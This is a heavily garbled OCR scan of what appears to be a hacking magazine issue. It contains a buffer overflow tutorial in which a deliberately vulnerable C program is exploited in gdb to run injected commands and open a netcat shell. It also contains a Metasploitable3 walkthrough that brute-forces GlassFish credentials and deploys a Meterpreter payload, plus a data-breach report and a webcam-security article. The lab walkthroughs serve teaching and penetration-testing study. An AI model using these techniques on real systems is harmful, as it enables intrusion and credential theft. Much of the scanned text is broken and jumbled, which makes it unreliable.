en ae en een et stra ae ee Ue ete a tee iy Tee sil [sh is a command language interpreter that executes commands from the standard input. Thi- is a BUG. Say it once again loudly "a BUG". The program is sent to the testers to find out w hat the bug can do The testers load the program using GNU Debugger about which our readers have learnt in our previous Issueeo) GNU gdb (Debian 8.2.1-2) 8.2.1 Copyright (C) 2018 Free Software Foundation, Inc (etek eee Come ESCM amen eC te7( Ug ACY) eee Lote i rie CRU al Mes heidet th cietd There is NO WARRANTY, to the extent permitted by law ne CU RS me pee ect ea ee ee Type “show configuration" for configuration details For bug reporting instructions, please see: . Find the GDB manual and other documentation resources online at SAR LCS CA Cc ie ues ules aCe, ee Type “apropos word" to search for conmands related to "word"... Reading symbols from ./second. . .done. sembly code of the p (gdb) disass main bump of assembler code for function main 0x0000000000001165 <+0> Pty Sta De rc Bt Seed Cy ‘rsp, %rbp ee eel er else p BU Se od TT) $0x10,%rsp Cees ocr mene cnc 6x0000000000001172 <+13>: callq 0x1060 0x0000000000001177 <+18> Ly eee clea) ©x000000000000117b <+22> Ly BSC 6x9000000000001180 <+27>: callq 0x1060 eee an a esl Ces) Se eee eC COT RC it et) 0x0000000000001190 <+43> Ly BS Cd CeCe sce mese cee callq 6x1040 Ol eee OS Pe 0x900000000000119e <+57>: mov %rax, &rdi. Ne ee ee BES Sse re Ly Sd re reel cls elle p BE eS solar et Meth me eked 6x90000000000011ab <+70>: mov —-@x8(%rbp) ,%rax De ee BE meee te Cy ir eee Deed Bae aed ic) OTT Tet) be # 0x202d Ce eet ea ed rereressectee scream mmSChy entre nee ote et) ee TSC eee er Cees cer ac oe 0x00000000000011c7 <+98>: ra Ar hae espe yee mes erm a ec ey eames eC SCS eric ceed Oc set mee ee erm ee esse amma) Deel eC Soe eras Lec] End of assembler dumplin the assembly code, you can see that there's a command "gets" that collects data from sta- Indard input. Introduce a breakpoint at the point shown below and run the program . With the breakpoint, the program stops running exactly at the point where you give input to the progra m. After giving input, you can continue the program as shown below. CCTs Breakpoint 1 at Oxllab: file second.c, line 10 (gdb) fy yy rt) printf ("Hi Cro mcrsur (Detaching after vfork from chil ess 143 rea) 1 (process 1425) exited normally] cre | lif you have observed in the above image, | have given 16 C's as input. This process is know- hn as fuzzing. Fuzzing is a process where we provide strings of varying length as input to find out where the buffer overflow occurs. This strings of different lengths can be created in various ways. Here's a method to create 's of varied lengths using python. ython -c “print 'C c “print print erie uly print e can also dircetly provide this random text created to the program as shown below instea: of copying and pasting it. rt TEC e ee eu: rrr) Name which superhero you want to be:Hello CC CCCCCCCCC hac agz@kal $ python -c “print 'C' De eae nc a ali) eras ca IThe program funni ager Creat Cost reac eee) CEC ae el) a eee acaacaacam Breakpoint 1, main () at second.c:10 10 Peurse aC une mo Crs Continuing Hello ccccceccececcceeceececcce [Detaching after vfork from child process 1447] CeCe mC cceeCL Msc Reg) (Crom) Sst er UA ee eee) Mme ae Mme sce Hecaccccaadccaucccaccaacccaad Breakpoint 1, main () at second.c:10 10 puta RC uae mr Crys earsuretr) AO adda lad ac aadaadaadaadaadaaaa flowed over thei r buffer onto the ne: (gdb) run Starting program: /home/hackercoolmagz/C/second Name which superhero you want to be:CCCCCCcccccccccecececececcecececcce Breakpoint 1, main () at second.c:10 aT) eurese eC UME Ue (gdb) ¢ Continuing. aa tmaccaaacacancacadcccacccacacaadacae [Detaching after vfork from child process 1453] Ish: 1: CCC: not found eCie Ce ce Cm sn Lae (adb) [So the size of the first buffer is 35-3 = 32 characters. Anything that jumps over this 32 charac ters onto next buffer is being executed as a command due to nction there. So lnext, give 32 C’s and then append a command "Is" to it as shown below. Cro Starting program: /home/hackercoolmagz/C/second EEC a ee) a co | tee eee ee ee ea dea ceaeeaceaedacea ey Breakpoint 1, main () at second.c:10 10 euG RC mee mL (gdb) c osu r at Racancaddandaddaadaadaacaacanccnaty [Detaching after vfork from child process 1455] [ele aene eeRest ir Lune eur afe ete CMe ie Mee acer cccececccadccaedccadccaccccaccaae Breakpoint 1, main () at second.c:10 rt) printf("Hello %s\n",sh_name) ; Cle Hello Lsccccccccecececccecccccecececccccc [Detaching after vfork from child process 1461] ish: 1: CC: not found OC eC lee ant ieee eek a 1Oe 8 (gdb) § (gdb) run Cosi ete DeLee ut eee) EU mel ae ac oe cea deed aedeadaadeadaedacdende em “ee Breakpoint 1, main () at second.c:10 euste eC Care eo (aC Rcccaaccccadcacaccccccccceccccece eM TU wry (Detaching after vfork from child process 1464] feels Linux kali 4.19.0-kalid-amd64 #1 SMP Debian 4.19.28-2kalil (2019-03-18) x86_64 G (yet CeCe Coc e eC MeO] (adb) ‘ou can even pop a raw shell to another m shown below. eT errs ecru aoe cp perer [| Cro Starting program: /home/hackercoolmagz/C/second Name which superhero you want to be:CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCne_192.168.3} (ere erey Breakpoint 1, main () at second.c:10 10 Petree uC Cue aL Cros Continuing Tbe Mancacadcccacaccadccaacccqacecece eC See CLEVE [Detaching after vfork from child process 1505]hackercoolmagz@kali:~$ ne -lvp 1234 ee omc? cee pC eee ee eC ere connect to [192.168.36.128] from (UNKNOWN) [192.168.36.130] 57080 [That's all for now. To add more fun, go to your "second.c" program and add some additional lines as highlighted below. These are print commands. second.c Eile Edit Search Options Help #include void main() { char *sh_name; char *command;| sh_name=(char*)malloc(10) ; command=(char*)malloc(128) ; printt( address of superhero name is: %d\n",sh_name); printf ("address of command is :%d\n", command) ; printf ("Difference between address is :%d\n", command-sh_name) ; Printt( Wame which superhero you want to ber”); gets(sh_name) ; printf("Hello %s\n",sh_name) ; system( command) ; } Compile again and now run the program. You should see something as shown below. Obser ved the difference? Ural at ss Sea address of name is : 1402401440 Tee ee ee mee ere CLP es ee eee et eee ceyy cet ae Ce ae ote Calor. Eee cc superhero name is : - command is :-20547372 Rae ee ee Ce ne ce nce ss of superhero nam ee eC weet aati betw addre: Bt Cee a eh sce Haat meadcccaccccadccaccccadcccccccaacaaa emcee aes mYHacking The GlassFish server running on port 4848 METASPLOITABLE TUTORIALS a Ne lin our previous Issue (February 2020), our readers have seen how we have gained access t- a Chinese web shell (Caidao) and took control of the target system using it. You have also een that we have gathered some information about the services running on the target. The information we have includes that a wordpress website is running on the target ,oth- er backdoors and credentials to the Mysql server running on the target. However, the servi- -e8 we collected information about were not accessible (port 3306 is not open, port 80 is run- hing IIS and the other webshells cannot be accessed). # nmap -sV 172.28.128.6 starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 04:10 EDT TU ace et Ho: up (0.000985 latency) (gees ssca eerie Saeed RSION eum prereset Peery Coie eM Tesla mss) Microsoft IIS httpd 7.5 open ssl/appse mss) ae Cee e sce ee uae eel Cy a Teste [ose] open ssl/http Pramas) eer eri eee oC es Pte nee rere otra RCM ries ER Mee merase please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?n| eee lin this Issue, let's target the Sun GlassFish Open Source Edition 1.1 running on port 8080. |Glassfish is an open source application server. Both ports 8080 and 4848 are used by this CS)ervice. The 4848 port serves it over a secure connection (https) as shown below. We have been postponing hacking into it because this needs credentials and default credentials were hot working. But today is the day. [Metasploit has many modules related to Glassfish. But for now we are interested in only two Imodules. One is a glassfish login scanner and the glassfish deployer module. The first one fo + cracking the credentials of glassfish and the second one for deploying a payload after we Ihave the credentials. eae eet rst) auxiliary/dos/http/hashcollision_dos or re ey Ceeketsty Presue ELSA MUA ye mr roar (Oe RC ee sae ney PPReC AVA Uisey] 1 ee 2015 Pre No Path Traversal in Oracle GUSSSEESH Server Open So dition Br cints Ces mSta Mee te rsegetst ame L oes No Java Applet AverageRangeStatisticInpl Remote Code cnet Peseta ere or) TOT TACR Reames) earetn Pr Otits Vise eae eet ee aera CET) tt a cer cremate an nest ec ckst] Sieeeretr Have any questions? Fire them to [email protected](PPCM Sc UCL ae CCUM eC) iirc esaec log! em Tet CR TS CUOMC COR c Luise PC Coee mC Ta) crud Current Setting Required Description Cao Le rr Try blank passwords for all user BRUTEFORCE SPEED 5 CRC ee Oe Pome red Try each user/password couple st Cou RCC ee ee false COC CCRC ute CO Ce ers Pee cer CeCe a Rea Ce ects Porn) A specific password to authentic Cremona PASS FILE File containing passwords, one p| Cameurd Proxies Pm OR Cas CHC bec ad Ohs Cet Le | ee oo RC a RC SC! CU cmRC CCM cr mnen Cee Lr 4848 ord Sec ae eam) false ir estes Wace eC Sure ce coe od Cost ee eagt uses CoC ae Moret ara) Ey SC eee (max one per host) eas et oy ote Cust coer esc no File containing users and passwo| eee et ae ee Ce Ce eu ee false no Try the username as the password meen mans cr PaCec eC MC oe) et Pe od See eae era Lee eas Esa Ti are aCe Perr Cece eeets [ree esaec rant ea SReUerc etc A eT ee eG em Cem Coors) *] 172.28.128.6:4848 - Glassfish is protected with a password rere et ea Une ec ace oss eee ste te kee eed 172.28.128.6:4848 - Failed: ‘admin:metasploitable172.28.128.6:4848 - Failed: ‘admin:Vulnerabilities' per ers ees roi ic at LUC Lae 172.28.128.6:4848 - Failed: 'admin:Privacy' ee et ee eee Her Cees toro ee eta ee er Unc ecy *] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed irseeeesaee lent ee | It failed to get the password. No problem. Lets' create another wordlist using the same tool lbut by changing the values of depth and keeping the minimum length of the password to 5 \earlier it was 6). We did this assuming the password also to be of same length as the length f username. $ cewl https://github.com/rapid7/metasploitable3/wiki -m 5 /home/hackercoolmagz/m3pass2.txt on tary eer teeter eet eee urate tree et eet eae er es 172.28.128.6:4848 - Failed: ‘admin: included’ eee eee ete) eee as) tert eet ea EE SUPT eta tee et ee meat rer une rc teeter ert eee er uae tree et eee ee race er cr pee ee ea ee aed tee er Moet eat EE Urea 172.28.128.6:4848 - Failed: ‘admin:needed' COME ee Are Memes ee ue es Scanned I of I hosts (100% complete) Auxiliary module execution completed ieee sabe oUt 6 C 6 reer ett eT ee et ed C 6 6 we have the c PT RCC estiae este CIOL ire Coed eee SCT Module options (exploit/multi/http/glassfish_deployer) reo Current Setting Required Description ae) wy Se aber eC Ue as ooo) oe The password for the specified username| eat a URC aes, Crist tied ,type:host:port][...] Ces yes eC CU SCLC uses Cem etCR Cm Tc masa Cin cad as rrr) ord ce oa eae eo ery ty ese Cac Ur menus TARGETURI / rd Le a ee Rescate Ce aC) rey eC ste eae Nas rr aes est) asOptions and executing the module, cee Cea ice tree ieeL a) rier eel ett a) ieee Cea ea CeCe Cos eer eed eos 172.28.128.6:4848 - This module does not support check nsf5 exploit( eat Se ec ee eUCetr eet ee ere rey ene rest Glassfish edition eu RO RUN OE SU Es ests rte ac ee Re ccs, eC eC CC ee erat cee Cursts tes Exploit completed, but no session was created ewer ) > he first thing we get is an error saying that authentication failed. On observation, we noticed hat it was a https service. We need to set the ssl option true. After setting ss! option and tryi Ing again, we get error again. Now it's finding it difficult to select a target automatically. [*] Started reverse TCP handler on 172.28.128.3:4444 freer Coes es GUrseC ie eC U Red C ens clay Cae este) meu RCT URE Ure ests [*] Attempting to automatically select a target Exploit aborted due to failure: no-target: Unable to automatically select a fers a yn below. rem eses Ce acy tees Tr Automatic CMe r le PCCP Niet Le eirraieconi oem eses ce iae! eer aed universal as our target, we also need to select an appropriate ea oie eho aCOOLEST) eae eared errs est) cru CMC UneTy eure acl Eire ees asm ICTs Executing /lwslpsrBi Pour c RE Meterpreter session 1 opened Coho Poet Getting information to undeploy TCO eUr Cn ec Lr e Poe aaa iets. admin: s meterpreter orice 0! ett Peeietenets Canc meterpreter > J Tsu) metasploitable3-win2! Pry ro eee ia or} tree eure Li Ce eet eet) Fish Server Open Source Edition > run Peery 4 Pees DATA BREACH THIS MONTH is an Italian email service providing co mpany. They provide both free and paid ema il services to the users. The company boasts f about half a million active email boxes. What? Data belonging to over has been ex Lposed over dark web. The worst part of this breach is that each and every scrap of inform- jation associated with these free accounts has been exposed apart from their usernames an- ld passwords. When we say every scrap of inf -ormation, we mean information in their mails, ISMS they sent, their security questions and lemail attachments. The passwords are in plain text form and it appears the company stored hem in that form since two years. Apart from his, the source codes of all email.it's web app Llications is part of the breach. Who? INN Hacking Group (which even has a twitter laccount), is the party responsible for keeping he stolen data for sale on dark web. The grou ers ~of for its claim. The group states that hacking for ransom is their common modus operandi a| -nd they put the data for sale only after email. t did not respond to their ransom demands. How? Although the group did not reveal how they h-| acked into the email.it's network they said the email.it's was the easiest for them as they had worst security compared to their other targets. Aftermath Email.it admitted to a data breach and informe] -d that it secured the network. The question that comes to the fore is why didn't email. it n- © tify its users or relevant authorities about the| data breach if hackers were in touch with the- m since January 2018. Hackercoolmagz's Take The data is already available online and the c-| ompany securing the network wouldn't make any big change. Also the company may face heavy fines due to its failure in reporting about} Lp announced that it hacked into email.it's ser- the breach. GDPR says that the breaches sh- January 2018 and even presented pro_ould be reported with 72 hrs of their detectionlackers Can Access Your Mobile And Laptop Cameras And Record You - Cover Them Now ONLINE SECURITY David Cook go unaccounted for. Lecturer, Computer and Security Science It's important to consider why someone Edith Cowan University would choose to hack into your home device. pastes you use Zoom, Skype or Microsoft _ It's unlikely an attacker will capture images of ‘eams, the webcam on your home PC or lapt YOu for personal blackmail, or their own creep Lop device has probably never been as active -y exploits. While these instances do eventuat is it is during this pandemic. Most of us have -€, the majority of illicit webcam access is rela camera built into our phone, tablet, laptop, a desktop webcam we use for work, study virtual socialising. -ted to gathering information for financial gain. Say cheese! Cybercriminals frequently attempt tricking peo Unfortunately, this privilege can leave us -Ple into believing they've been caught by a julnerable to an online attack known as camf- Webcam hack. Everyday there are thousands ecting. This is whe of spam emails se- nhackers takeco "When your laptop is turned off its "tina bid to convi-| . they’ ve or oe Webcam can't be be activated. Het et They do this by However, many of us keep our _ camera. But why? disabling the “on” faptops in hibernation or sleep —_Shaming people fo ight which usually mode (which are different). In this ‘ercrr ccm: raisactive-so case, the device can be woken by a sway isa scam, o indicates the came webcam use in thi- jictims are none he wiser. Many of our device cameras remain unse- cured. In fact, research has suggested globall ¥y there are more than 15,000 web camera jevices (including in homes and businesses) ‘eadily accessible to hackers, without even eeding to be hacked. ake a tip from Mark Zuckerberg |When your laptop is turned off its webcam ca- rs be activated. However, many of us keep 0- laptops in hibernation or sleep mode(which re different). In this case, the device can be oken by a cybercriminal, and the camera tur Lned on. Even Mark Zuckerberg has admitted e covers his webcam and masks his micro— hone. The number of recorded instances of image cyber criminal." -ne which generat- es considerable ra -nsom success. Many victims pay up in fear of being publicly exposed. Most genuine webcam hacks are ta- rgeted attacks to gather restricted information. They often involve tech-savvy corporate grou- ps carrying out intelligence gathering and cov- ert image capturing. Some hacks are acts of corporate espionage, while others are the bus. -iness of government intelligence agencies. There are two common acquisition techniq -ues used in camfecting attacks. The first is k- nown as an RAT (Remote Administration Tool ) and the second takes place through false “re -mote tech support” offered by malicious peop] le. Genuine remote tech support usually comes| aptured through unauthorised webcam acce- from your retail service provider (such as Tels is relatively low. This is because most atta- -tra or Optus). We trust our authorised tech su ks happen without the user ever realising the -Pport people, but you shouldn't extend that -y've been compromised. Thus, these attacks trust to a “friend” you hardly know offering toyou" with a problem. An example of an RAT is a Trojan virus delivered through email. This lives hackers internal control of a device. Total Access hen a Trojan virus infects a device, it's not just the webcam that is remotely accessed, it’ the whole computer. This means access to bility to install a RAT has been around for se veral years. In 2015, a popular RAT could be ise thelr own remote Support software to “hel- iles, photos, banking and a range of data. The Trengine allows you to identify which of your devices can be seen by others through an int- emet connection. Practise ‘cyberhygiene’ at home Placing a piece of black tape over a camera is one simple low-tech solution for webcam hack| -ing. Turning your laptop or desktop computer off when not in use is also a good idea. Don't let a device's hibernation, sleep or low power mode lure you into a false sense of safety. At work you may have firewalls, antivirus, urchased on the internet for just US $40.The ‘alware (harmful software) can be deployed fia an email, attac- ment or flash dri- and intrusion detection systems provided by y -our company. Such protections are void for most of us when working from hom-| e. "Cyber hygiene” practices will help secure you from potential attacks Always use secure passwords and avoid recyclin -g old ones with a- Jeasie r for hackers. dded numbers suc Webcams are everywhere -h as “Richmond2019", or “Manutd2020”. Jur homes are getting “smarter” each year. In Also, make sure your antivirus and operating 1018, the average Australian household repor system software is regularly updated. Most of tedly had 17 connected devices. Let's say th- all, use common sense. Don't share your pas- re’s one or two laptops, three or four mobile sword (including your home wifi password), hones and tablets, a home security camera don't click suspicious links, and routinely clear ystem and a smart TV with a built-in camera_ your devices of unnecessary apps. for facial recognition. When it comes to using webcams, you may Add a remote video doorbell, a talking doll wonder if you're ever completely safe. This is amed My Friend Cayla, the drone helicopter hard to know — but rest assured there are step] ou got for Christmas, and the robot toy that -$ You can take to glve yourself a better chanc lows you around the house — and it's possi- le your household has more than 20 IP acce sible cameras. To better understand your vulnerabilities ou can try a product like Shodan. This searc- "When a Trojan virus infects a device, it's not just the webcam that is remotely accessed, it's the whole computer. This means access to files, photos, banking and a range of data”. “Those wanting to jearn how to use s- ch tools need loo- no further than ‘ouTube, which jas many tutorials. lit has never been (Article First Appeared on theconversation.com) All your doubts, queries and questions about ethical hacking and penetration testing can be sent to [email protected] or get to us at our Facebook Page Hackercool Magazine or tweet us at @hackercoolmagz.SOME USEFUL RESOURCES Check whether your email is a part of any data breach now. https://haveibeenpwned.com Get vulnerable software discussed in this Issue. https://github.com/hackercoolmagz/vulnera Tweet to us. Follow Us on Facebook hackercoolmagz _| Hackercool Magazine [email protected] [email protected] Our Blog https://hackercoolmagazine/blog Visit Our New Website https://hackercoolmagazine.comHackercool Capture BBall era Cad Hackercool Hackercool Hackercool pO tn ee Ay Ttoregoe ag Ped Pt a cu : eet ae ed Hackercool Pee ol es